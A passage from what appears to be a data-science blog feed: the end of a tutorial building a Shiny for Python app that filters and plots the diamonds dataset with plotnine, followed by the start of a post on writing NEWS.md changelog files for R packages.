&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; app_ui
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;frontend &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; create_ui(diamonds)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The first argument of both the input widget and the output container is a unique id. These ids are used on the server side to identify the inputs and outputs that we want to work with.&lt;/p&gt;
&lt;p&gt;Our &lt;code&gt;input_selectize(&amp;quot;select&amp;quot;, ...)&lt;/code&gt; widget responds to the user&amp;rsquo;s actions in the browser and sends the chosen values as an &lt;code&gt;input&lt;/code&gt; to the server function. The value is accessible through its unique id &amp;ldquo;select&amp;rdquo; as &lt;code&gt;input.select()&lt;/code&gt;. Similarly, the &lt;code&gt;output_plot(&amp;quot;out&amp;quot;)&lt;/code&gt; container lets us draw a chart into that position in the application using the &lt;code&gt;@output(id=&amp;quot;out&amp;quot;)&lt;/code&gt; decorator, which refers to the id &amp;ldquo;out&amp;rdquo;. The output decorator is accompanied by a renderer, which dictates how the object should be drawn to the screen.&lt;/p&gt;
&lt;p&gt;We will use &lt;code&gt;plotnine&lt;/code&gt; to draw a graph based on a subset of the diamonds data chosen by the user, and define our server function as follows:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;shiny&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; render
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;plotnine&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;gg&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;plotnine.data&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; diamonds
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# utility function to draw a scatter plot&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;create_plot&lt;/span&gt;(data):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; (
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; gg&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ggplot(data, gg&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;aes(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;carat&amp;#39;&lt;/span&gt;, y&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;price&amp;#39;&lt;/span&gt;, color&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;color&amp;#39;&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; gg&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;geom_point()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; plot&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;draw()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# wrapper function for the server, allows the data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# to be passed in&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;create_server&lt;/span&gt;(data):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;f&lt;/span&gt;(input, output, session):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;@output&lt;/span&gt;(id&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;out&amp;#34;&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# decorator to link this function to the &amp;#34;out&amp;#34; id in the UI&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;@render.plot&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# a decorator to indicate we want the plot renderer&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; list(input&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;select()) &lt;span style="color:#8b949e;font-style:italic"&gt;# access the input value bound to the id &amp;#34;select&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sub &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; data[data[&lt;span style="color:#a5d6ff"&gt;&amp;#39;color&amp;#39;&lt;/span&gt;]&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;isin(color)] &lt;span style="color:#8b949e;font-style:italic"&gt;# use it to create a subset&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; create_plot(sub) &lt;span style="color:#8b949e;font-style:italic"&gt;# create our plot&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; plot &lt;span style="color:#8b949e;font-style:italic"&gt;# and return it&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; f
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;server &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; create_server(diamonds)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The full source, saved as &amp;ldquo;diamonds.py&amp;rdquo; and including the creation of the app object, is:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# diamonds.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;shiny&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; App, ui, render
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;plotnine&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;gg&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;plotnine.data&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; diamonds
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pandas&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pd&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# function that creates our UI based on the data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# we give it&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;create_ui&lt;/span&gt;(data: pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;DataFrame):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# calculate the set of unique choices that could be made&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; choices &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; data[&lt;span style="color:#a5d6ff"&gt;&amp;#39;color&amp;#39;&lt;/span&gt;]&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;unique()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# create our ui object&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app_ui &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page_fluid(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# row and column here are functions&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# to aid laying out our page in an organised fashion&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;row(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;column(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, offset&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;,&lt;span style="color:#ff7b72;font-weight:bold"&gt;*&lt;/span&gt;[
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# an input widget that allows us to select multiple values&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# from the set of choices&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;input_selectize(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;select&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Color&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; choices&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;list(choices),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; multiple&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;column(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;column(&lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# an output container in which to render a plot&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;output_plot(&lt;span style="color:#a5d6ff"&gt;&amp;#34;out&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; app_ui
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;frontend &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; create_ui(diamonds)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# utility function to draw a scatter plot&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;create_plot&lt;/span&gt;(data):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; (
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; gg&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ggplot(data, gg&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;aes(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;carat&amp;#39;&lt;/span&gt;, y&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;price&amp;#39;&lt;/span&gt;, color&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;color&amp;#39;&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; gg&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;geom_point()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; plot&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;draw()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# wrapper function for the server, allows the data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# to be passed in&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;create_server&lt;/span&gt;(data):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;f&lt;/span&gt;(input, output, session):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;@output&lt;/span&gt;(id&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;out&amp;#34;&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# decorator to link this function to the &amp;#34;out&amp;#34; id in the UI&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;@render.plot&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# a decorator to indicate we want the plot renderer&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; list(input&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;select()) &lt;span style="color:#8b949e;font-style:italic"&gt;# access the input value bound to the id &amp;#34;select&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sub &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; data[data[&lt;span style="color:#a5d6ff"&gt;&amp;#39;color&amp;#39;&lt;/span&gt;]&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;isin(color)] &lt;span style="color:#8b949e;font-style:italic"&gt;# use it to create a subset&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; create_plot(sub) &lt;span style="color:#8b949e;font-style:italic"&gt;# create our plot&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; plot &lt;span style="color:#8b949e;font-style:italic"&gt;# and return it&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; f
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;server &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; create_server(diamonds)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; App(frontend, server)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Finally, we run the app to see the fruits of our labour:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;shiny run --port &lt;span style="color:#a5d6ff"&gt;3838&lt;/span&gt; diamonds.py
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img alt="Screenshot of a simple Shiny application" height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/r-shiny-python-posit-rstudio/diamonds_screenshot.png" width="1739"&gt;&lt;/p&gt;
&lt;p&gt;We can update the chart by selecting the colours of diamonds that we want to display in the dropdown.&lt;/p&gt;
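&lt;p&gt;The subsetting step that drives this update can be tried on its own, outside of Shiny. The sketch below is illustrative only: it uses a tiny hand-made data frame rather than the real &lt;code&gt;diamonds&lt;/code&gt; data, and &lt;code&gt;subset_by_color()&lt;/code&gt; is a hypothetical helper that mirrors the subsetting line in the server function. It also assumes that the selected values arrive as a sequence of strings.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;import pandas as pd

# toy stand-in for the diamonds data (values are made up for illustration)
toy = pd.DataFrame({
    "carat": [0.23, 0.31, 0.70, 1.01],
    "price": [326, 335, 2757, 4500],
    "color": ["E", "J", "E", "G"],
})

# hypothetical helper mirroring the subsetting line in the server function
def subset_by_color(data, selected):
    return data[data["color"].isin(list(selected))]

# a selection of two colours keeps only the matching rows
print(subset_by_color(toy, ("E", "G")))

# an empty selection matches nothing, so the subset has no rows
print(len(subset_by_color(toy, ())))
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Only rows whose colour is in the selection are kept, so each change to the dropdown hands a different subset to &lt;code&gt;create_plot()&lt;/code&gt;.&lt;/p&gt;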
&lt;p&gt;An example of this app that you can browse and edit is hosted &lt;a href="https://jumpingrivers.github.io/blog-hello-shiny-python/edit/" rel="external"&gt;here&lt;/a&gt; using the new Shinylive. The source is also available in our &lt;a href="https://github.com/jumpingrivers/blog" rel="external"&gt;blogs repository&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-shiny-python-posit-rstudio/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Have we got NEWS.md for you</title><link>https://www.jumpingrivers.com/blog/intro-to-r-news-format/</link><pubDate>Thu, 18 Aug 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/intro-to-r-news-format/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/intro-to-r-news-format/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/intro-to-r-news-format/rnews2.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;When developing a package it is essential to track the changes you make to your code. This is especially vital if they are breaking changes which have implications for any code written that depends on your package, i.e. a major version bump. Although you can always look back at your version control history in git, it is also convenient to have documentation which summarises the changes.&lt;/p&gt;
&lt;p&gt;This is where the NEWS file comes in. Usually a &lt;code&gt;.md&lt;/code&gt; file, the NEWS contains a description of the changes made between each version of a package up until the latest version. It is used to log things such as new features that have been added or bugs that have been fixed.&lt;/p&gt;
&lt;p&gt;In this blog post we will look at how to write a NEWS file and what guidelines and good practices there are to follow.&lt;/p&gt;
&lt;h3 id="who-uses-the-news"&gt;Who uses the NEWS&lt;/h3&gt;
&lt;p&gt;A NEWS file is useful for developers to keep track of changes. However, it is primarily looked at by users of the package to check any changes in a new version that could affect or be of interest to them. Therefore, the changes logged in a NEWS file are specifically user-facing, rather than a complete list of all changes.&lt;/p&gt;
&lt;h3 id="news-file-guidelines"&gt;NEWS file guidelines&lt;/h3&gt;
&lt;p&gt;There is not really a strict set of rules when it comes to NEWS files in R. Nevertheless, there are some rough guidelines to keep in mind. See, for example, Sec 1.1 of the &lt;a href="https://cran.r-project.org/doc/manuals/r-release/R-exts.html#Package-structure" rel="external"&gt;R package manual&lt;/a&gt; and Ch 18 of &lt;a href="https://r-pkgs.org/other-markdown.html#news" rel="external"&gt;R packages (second edition)&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Some R package universes also have their own NEWS file guidelines. For example, &lt;a href="https://style.tidyverse.org/news.html" rel="external"&gt;tidyverse&lt;/a&gt;, &lt;a href="https://devguide.ropensci.org/newstemplate.html#newstemplate" rel="external"&gt;rOpenSci&lt;/a&gt; and &lt;a href="https://www.bioconductor.org/developers/package-guidelines/#news" rel="external"&gt;Bioconductor&lt;/a&gt;. These guidelines have a lot of overlap and mostly follow what we will detail in the following sections.&lt;/p&gt;
&lt;h4 id="location-and-file-type"&gt;Location and file type&lt;/h4&gt;
&lt;p&gt;Let&amp;rsquo;s first consider where the NEWS should sit within your package.&lt;/p&gt;
&lt;p&gt;The NEWS file is usually found at the top level of the package folder, and can take one of the following formats:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Plain text (&lt;code&gt;NEWS&lt;/code&gt;)&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Markdown (&lt;code&gt;NEWS.md&lt;/code&gt;)&lt;/strong&gt; - this is the most common format&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;R document (&lt;code&gt;inst/NEWS.Rd&lt;/code&gt;)&lt;/strong&gt; - note that this sits in the &lt;code&gt;inst&lt;/code&gt; subdirectory of your package, so gets copied into the top level when the package is installed&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Including a NEWS file is entirely optional. From our own analyses of the CRAN packages for &lt;a href="https://diffify.com" rel="external"&gt;diffify.com&lt;/a&gt;, we have found that fewer than half contain a NEWS file!&lt;/p&gt;
&lt;h4 id="content"&gt;Content&lt;/h4&gt;
&lt;p&gt;The R package manual recommends the &lt;a href="https://www.gnu.org/prep/standards/standards.html#Documentation" rel="external"&gt;GNU standard&lt;/a&gt;. Referring to Sec 6.7, these guidelines state the following:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The NEWS should contain &amp;ldquo;user-visible&amp;rdquo; changes that are &amp;ldquo;worth mentioning&amp;rdquo;.&lt;/li&gt;
&lt;li&gt;Changes for the latest release should be displayed at the top of the file, alongside a heading which indicates the version number.&lt;/li&gt;
&lt;li&gt;Older items should be displayed further down the file and should never be discarded, since they will be of interest to a user upgrading from a previous version.&lt;/li&gt;
&lt;li&gt;If the file gets very long, you can move some of the older changes to a separate &lt;code&gt;ONEWS&lt;/code&gt; file.&lt;/li&gt;
&lt;/ul&gt;
